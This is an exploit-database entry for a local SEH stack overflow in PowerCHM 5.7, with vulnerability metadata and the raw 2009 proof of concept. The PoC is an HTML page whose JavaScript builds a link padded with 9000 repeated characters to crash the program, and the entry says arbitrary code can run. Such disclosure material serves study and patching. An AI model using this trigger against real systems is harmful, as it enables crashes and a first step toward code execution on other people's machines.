header-logo
Suggest Exploit
vendor:
PowerCHM 5.7
by:
SuB-ZeRo
8,8
CVSS
HIGH
Stack Overflow
119
CWE
Product Name: PowerCHM 5.7
Affected Version From: 5.7
Affected Version To: 5.7
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC

PowerCHM 5.7 is vulnerable to a local stack overflow (SEH) vulnerability. By supplying a long URL, an attacker can overwrite the SEH chain and execute arbitrary code.

Mitigation:

Upgrade to the latest version of PowerCHM 5.7
Source

Exploit-DB raw data:

<html>
<body>
<br>
<font style="font-family:arial;font-size:24px">PowerCHM 5.7 (Long url) Local stack overflow (SEH) POC</font><br>
<font style="font-family:arial;font-size:19px">found By SuB-ZeRo (fbh@hotmail.com) thnaks to hisok4</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:12px">Greetz:All friends and muslims HackeRs secdz.com</font><br>
<br>

<script language="JavaScript">
var crash = "http://";

for (i=0;i<9000;i++) crash +="%41";

crash += "/test.rar"

document.write ('<a href="' + crash + '">B00M!</a>');

</script>
</body>
</html>

# milw0rm.com [2009-04-14]

Navigation

Suggest Exploit

Services By CQR